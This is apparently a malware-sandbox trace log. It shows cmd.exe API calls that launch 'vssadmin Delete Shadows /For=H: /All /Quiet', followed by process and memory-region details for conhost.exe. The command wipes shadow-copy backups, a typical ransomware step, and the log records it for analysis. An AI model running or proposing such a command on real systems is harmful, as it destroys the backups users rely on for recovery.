	[0304.379] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0304.379] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0304.380] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0304.380] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0304.380] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0304.380] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0304.380] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0304.380] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0304.380] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0304.380] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0304.382] GetProcessHeap () returned 0x4600000
	[0304.382] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0x210) returned 0x46090c0
	[0304.382] GetProcessHeap () returned 0x4600000
	[0304.382] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0x64) returned 0x46092d8
	[0304.382] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0304.383] GetProcessHeap () returned 0x4600000
	[0304.383] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0x418) returned 0x46005c8
	[0304.385] SetErrorMode (uMode=0x0) returned 0x0
	[0304.385] SetErrorMode (uMode=0x1) returned 0x0
	[0304.385] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46005d0, lpFilePart=0x19f364 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f364*="Desktop") returned 0x1d
	[0304.385] SetErrorMode (uMode=0x0) returned 0x1
	[0304.386] GetProcessHeap () returned 0x4600000
	[0304.386] RtlReAllocateHeap (Heap=0x4600000, Flags=0x0, Ptr=0x46005c8, Size=0x56) returned 0x46005c8
	[0304.386] GetProcessHeap () returned 0x4600000
	[0304.386] RtlSizeHeap (HeapHandle=0x4600000, Flags=0x0, MemoryPointer=0x46005c8) returned 0x56
	[0304.386] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0304.386] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0304.387] GetProcessHeap () returned 0x4600000
	[0304.387] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0x182) returned 0x4609348
	[0304.387] GetProcessHeap () returned 0x4600000
	[0304.387] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0x2fc) returned 0x4600628
	[0304.413] GetProcessHeap () returned 0x4600000
	[0304.413] RtlReAllocateHeap (Heap=0x4600000, Flags=0x0, Ptr=0x4600628, Size=0x184) returned 0x4600628
	[0304.413] GetProcessHeap () returned 0x4600000
	[0304.413] RtlSizeHeap (HeapHandle=0x4600000, Flags=0x0, MemoryPointer=0x4600628) returned 0x184
	[0304.413] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0304.413] GetProcessHeap () returned 0x4600000
	[0304.413] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0xe0) returned 0x46094d8
	[0304.465] GetProcessHeap () returned 0x4600000
	[0304.465] RtlReAllocateHeap (Heap=0x4600000, Flags=0x0, Ptr=0x46094d8, Size=0x76) returned 0x46094d8
	[0304.465] GetProcessHeap () returned 0x4600000
	[0304.465] RtlSizeHeap (HeapHandle=0x4600000, Flags=0x0, MemoryPointer=0x46094d8) returned 0x76
	[0304.467] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0304.467] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x19f0f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f0f0) returned 0xffffffff
	[0304.468] GetLastError () returned 0x2
	[0304.468] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0304.468] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x19f0f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f0f0) returned 0xffffffff
	[0304.470] GetLastError () returned 0x2
	[0304.470] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0304.470] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x19f0f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f0f0) returned 0x4609558
	[0304.471] GetProcessHeap () returned 0x4600000
	[0304.471] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x0, Size=0x14) returned 0x4607838
	[0304.471] FindClose (in: hFindFile=0x4609558 | out: hFindFile=0x4609558) returned 1
	[0304.471] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x19f0f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f0f0) returned 0xffffffff
	[0304.471] GetLastError () returned 0x2
	[0304.472] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x19f0f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f0f0) returned 0x4609558
	[0304.472] GetProcessHeap () returned 0x4600000
	[0304.472] RtlReAllocateHeap (Heap=0x4600000, Flags=0x0, Ptr=0x4607838, Size=0x4) returned 0x4609598
	[0304.472] FindClose (in: hFindFile=0x4609558 | out: hFindFile=0x4609558) returned 1
	[0304.472] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0304.472] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0304.472] GetConsoleTitleW (in: lpConsoleTitle=0x19f5e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0304.579] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f510, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f4f4 | out: lpAttributeList=0x19f510, lpSize=0x19f4f4) returned 1
	[0304.579] UpdateProcThreadAttribute (in: lpAttributeList=0x19f510, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f4fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f510, lpPreviousValue=0x0) returned 1
	[0304.579] GetStartupInfoW (in: lpStartupInfo=0x19f548 | out: lpStartupInfo=0x19f548*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0304.579] GetProcessHeap () returned 0x4600000
	[0304.579] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0x18) returned 0x46078f8
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0304.580] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0304.581] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0304.582] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0304.582] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0304.582] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0304.582] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0304.582] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0304.582] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0304.582] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0304.582] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0304.582] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0304.582] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0304.582] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0304.582] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0304.582] GetProcessHeap () returned 0x4600000
	[0304.583] RtlFreeHeap (HeapHandle=0x4600000, Flags=0x0, BaseAddress=0x46078f8) returned 1
	[0304.583] GetProcessHeap () returned 0x4600000
	[0304.583] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0xa) returned 0x4609558
	[0304.583] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0304.588] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=H: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f498*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=H: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f4e4 | out: lpCommandLine="vssadmin  Delete Shadows /For=H: /All /Quiet ", lpProcessInformation=0x19f4e4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1234, dwThreadId=0x133c)) returned 1
	[0304.609] CloseHandle (hObject=0xa4) returned 1
	[0304.609] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0304.609] GetProcessHeap () returned 0x4600000
	[0304.609] RtlFreeHeap (HeapHandle=0x4600000, Flags=0x0, BaseAddress=0x460b858) returned 1
	[0304.609] GetEnvironmentStringsW () returned 0x460a148*
	[0304.609] GetProcessHeap () returned 0x4600000
	[0304.609] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0xb9c) returned 0x460acf0
	[0304.609] memcpy (in: _Dst=0x460acf0, _Src=0x460a148, _Size=0xb9c | out: _Dst=0x460acf0) returned 0x460acf0
	[0304.609] FreeEnvironmentStringsA (penv="=") returned 1
	[0304.609] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0317.294] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x19f47c | out: lpExitCode=0x19f47c*=0x2) returned 1
	[0317.294] CloseHandle (hObject=0xa8) returned 1
	[0317.295] _vsnwprintf (in: _Buffer=0x19f564, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f484 | out: _Buffer="00000002") returned 8
	[0317.296] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0317.297] GetProcessHeap () returned 0x4600000
	[0317.297] RtlFreeHeap (HeapHandle=0x4600000, Flags=0x0, BaseAddress=0x460acf0) returned 1
	[0317.297] GetEnvironmentStringsW () returned 0x460a148*
	[0317.297] GetProcessHeap () returned 0x4600000
	[0317.297] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0xbc2) returned 0x460c468
	[0317.297] memcpy (in: _Dst=0x460c468, _Src=0x460a148, _Size=0xbc2 | out: _Dst=0x460c468) returned 0x460c468
	[0317.298] FreeEnvironmentStringsA (penv="=") returned 1
	[0317.298] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0317.298] GetProcessHeap () returned 0x4600000
	[0317.298] RtlFreeHeap (HeapHandle=0x4600000, Flags=0x0, BaseAddress=0x460c468) returned 1
	[0317.298] GetEnvironmentStringsW () returned 0x460a148*
	[0317.298] GetProcessHeap () returned 0x4600000
	[0317.298] RtlAllocateHeap (HeapHandle=0x4600000, Flags=0x8, Size=0xbc2) returned 0x460c468
	[0317.298] memcpy (in: _Dst=0x460c468, _Src=0x460a148, _Size=0xbc2 | out: _Dst=0x460c468) returned 0x460c468
	[0317.298] FreeEnvironmentStringsA (penv="=") returned 1
	[0317.298] GetProcessHeap () returned 0x4600000
	[0317.298] RtlFreeHeap (HeapHandle=0x4600000, Flags=0x0, BaseAddress=0x4609558) returned 1
	[0317.298] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f510 | out: lpAttributeList=0x19f510) 
	[0317.298] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0317.298] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0317.402] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0317.402] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0317.532] _get_osfhandle (_FileHandle=0) returned 0x38
	[0317.532] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0317.614] SetConsoleInputExeNameW () returned 0x1
	[0317.614] GetConsoleOutputCP () returned 0x1b5
	[0317.712] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0317.712] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0317.926] exit (_Code=2) 

Thread:
	id = 373
	os_tid = 0x1284


Process:
	id = "66"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x2bb04000"
	os_pid = "0x1088"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "65"
	os_parent_pid = "0x62c"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4911
	        start_va = 0x3fa00000
	          end_va = 0x3fbfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000003fa00000"
	        filename = ""

Region:
	              id = 4912
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4913
	        start_va = 0xf13f8c0000
	          end_va = 0xf13f8fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000f13f8c0000"
	        filename = ""

Region:
	              id = 4914
	        start_va = 0xf13fa00000
	          end_va = 0xf13fbfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000f13fa00000"
	        filename = ""

Region:
	              id = 4915
	        start_va = 0x1f6d38e0000
	          end_va = 0x1f6d38fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d38e0000"
	        filename = ""

Region:
	              id = 4916
	        start_va = 0x1f6d3900000
	          end_va = 0x1f6d3914fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d3900000"
	        filename = ""

Region:
	              id = 4917
	        start_va = 0x7df5ff5b0000
	          end_va = 0x7ff5ff5affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff5b0000"
	        filename = ""

Region:
	              id = 4918
	        start_va = 0x7ff7ff700000
	          end_va = 0x7ff7ff722fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff700000"
	        filename = ""

Region:
	              id = 4919
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 4920
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4921
	        start_va = 0x1f6d3920000
	          end_va = 0x1f6d3aaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d3920000"
	        filename = ""

Region:
	              id = 4922
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 4926
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 4927
	        start_va = 0x1f6d38e0000
	          end_va = 0x1f6d38effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d38e0000"
	        filename = ""

Region:
	              id = 4928
	        start_va = 0x7ff7ff600000
	          end_va = 0x7ff7ff6fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff600000"
	        filename = ""

Region:
	              id = 4929
	        start_va = 0x1f6d3ab0000
	          end_va = 0x1f6d3b6dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4930
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 4931
	        start_va = 0xf13f900000
	          end_va = 0xf13f93ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000f13f900000"
	        filename = ""

Region:
	              id = 4932
	        start_va = 0x1f6d3b70000
	          end_va = 0x1f6d3c8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d3b70000"
	        filename = ""

Region:
	              id = 4934
	        start_va = 0x1f6d38f0000
	          end_va = 0x1f6d38f6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d38f0000"
	        filename = ""

Region:
	              id = 4935
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 4936
	        start_va = 0x1f6d3920000
	          end_va = 0x1f6d3920fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d3920000"
	        filename = ""

Region:
	              id = 4937
	        start_va = 0x1f6d39b0000
	          end_va = 0x1f6d3aaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d39b0000"
	        filename = ""

Region:
	              id = 4938
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 4939
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 4940
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 4941
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 4942
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 4943
	        start_va = 0x1f6d3930000
	          end_va = 0x1f6d3936fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d3930000"
	        filename = ""

Region:
	              id = 4944
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 4945
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 4946
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 4947
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 4948
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 4949
	        start_va = 0x1f6d3940000
	          end_va = 0x1f6d3940fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d3940000"
	        filename = ""

Region:
	              id = 4950
	        start_va = 0x1f6d3950000
	          end_va = 0x1f6d3950fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d3950000"
	        filename = ""

Region:
	              id = 4951
	        start_va = 0x1f6d3c90000
	          end_va = 0x1f6d3e17fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d3c90000"
	        filename = ""

Region:
	              id = 4952
	        start_va = 0x1f6d3e20000
	          end_va = 0x1f6d3fa0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d3e20000"
	        filename = ""

Region:
	              id = 4953
	        start_va = 0x1f6d3fb0000
	          end_va = 0x1f6d53affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d3fb0000"
	        filename = ""

Region:
	              id = 4954
	        start_va = 0x1f6d53b0000
	          end_va = 0x1f6d556ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d53b0000"
	        filename = ""

Region:
	              id = 4955
	        start_va = 0xf13f940000
	          end_va = 0xf13f97ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000f13f940000"
	        filename = ""

Region:
	              id = 4956
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 4957
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
